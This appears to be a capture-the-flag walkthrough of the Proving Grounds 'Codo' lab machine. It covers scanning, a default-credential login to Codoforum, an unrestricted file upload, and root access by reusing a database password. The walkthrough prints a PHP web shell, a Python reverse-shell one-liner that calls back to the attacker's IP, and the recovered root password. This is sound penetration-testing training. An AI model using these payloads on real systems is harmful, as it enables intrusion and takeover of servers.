PG - Codo

PG – Codo

In this walk through, we will be going through the Codo room from Proving Grounds. This room is rated as Easy on the platform and it consists of exploitation via Codoforum RCE exploit to get the initial foothold and dumping of DB password stored in config file to get root. So, let’s get started without any delay.

Codo

Machine Info:

TitleCodo
IPaddress192.168.228.23
DifficultyEasy
OSLinux
DescriptionCodo is an Easy Linux machine that uses Codoforum RCE exploit to get the initial foothold and DB password stored in config file to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.228.23
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-19 23:02 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 192.168.228.23, 16) => Operation not permitted
Offending packet: TCP 192.168.45.199:58782 > 192.168.228.23:53 S ttl=56 id=50278 iplen=44  seq=26641917 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 192.168.228.23, 16) => Operation not permitted
Offending packet: TCP 192.168.45.199:58783 > 192.168.228.23:53 S ttl=37 id=37831 iplen=44  seq=26707452 win=1024 <mss 1460>
Nmap scan report for 192.168.228.23
Host is up (0.21s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: All topics | CODOLOGIC
| vulners: 
|   cpe:/a:apache:http_server:2.4.41: 
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2020-11984	7.5	https://vulners.com/cve/CVE-2020-11984
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	1337DAY-ID-34882	7.5	https://vulners.com/zdt/1337DAY-ID-34882*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-36160	5.0	https://vulners.com/cve/CVE-2021-36160
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-30641	5.0	https://vulners.com/cve/CVE-2021-30641
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2020-13950	5.0	https://vulners.com/cve/CVE-2020-13950
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|     	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
|     	CVE-2020-11993	4.3	https://vulners.com/cve/CVE-2020-11993
|_    	1337DAY-ID-35422	4.3	https://vulners.com/zdt/1337DAY-ID-35422*EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   205.67 ms 192.168.45.1
2   205.65 ms 192.168.45.254
3   206.16 ms 192.168.251.1
4   206.19 ms 192.168.228.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.94 seconds

nmap scan

  • Enumerated the web server on port 80 and found Codoforum CMS running.

Codoforum CMS

  • Found a login page in the navigation menu. Tried common password like admin:admin and got in.

Codoforum CMS login panel

Logged in using default creds

  • Fired gobuster on the target to reveal some hidden directories and found an Interesting one – /admin.

gobuster dir -u http://192.168.228.23/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Navigated to the directory and logged in using the same creds used before to access the admin dashboard.

admin directory

Codoforum Dashboard

Initial Access:

  • As per the above results, we can see the running application version is 5.1. Looked for any known exploits related to it and found a RCE.

searchsploit codoforum

searchsploit codoforum

  • Copied the exploit to my current working directory using searchsploit.

searchsploit -m php/webapps/50978.py

download the RCE exploit

  • Tried to fire it however it did not work. Instead of fixing it, i went down to manual route.

fired the exploit

  • I knew that the vulnerability lies in improper file upload functionality which let us upload arbitrary files on the server. That means, we can upload our web shell onto the target and can use it to interact with the server.

Codoforum settings

File Upload functionality

  • Uploaded the php web shell with below PHP snippet onto the server using the Uplod Logo functionality.

<?php
echo system($_GET['c']);
?>

shell.php

  • Accessed the web shell with the below URL and got a successful result in return.

http://192.168.228.23/sites/default/assets/img/attachments/shell.php?c=id

got web shell access

  • Next, used the below python reverse shell one liner in order to get a reverse shell back at my netcat listener. Therefore, getting the initial foothold.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.199",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

python3 installed

got initial access

Privilege Escalation:

  • Once inside, i looked into the config.php that contains database password of codoforumdb.

cat config.php

cat config.php

  • I tried to switch user to root with the newly found password and i was able to do that giving us shell as root.

su root
FatPanda123

got root

  • Finally captured the proof.txt flag and completed the machine.

proof flag

Also Read: PG – Clue

Conclusion:

Conclusion

So that was “Codo” for you. We started off with a regular nmap scan and two ports opened – 22 (SSH) and 80 (HTTP). Enumerated the web server on port 80 and found a Codoforum CMS running. Logged in using default credentials and found out that it is running version 5.1.150 on it. Looked for any known exploit and found a RCE exploit. Used it to get the initial foothold. Once inside, looked into the config.php file and found the root password. Used the same to get root on the system. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top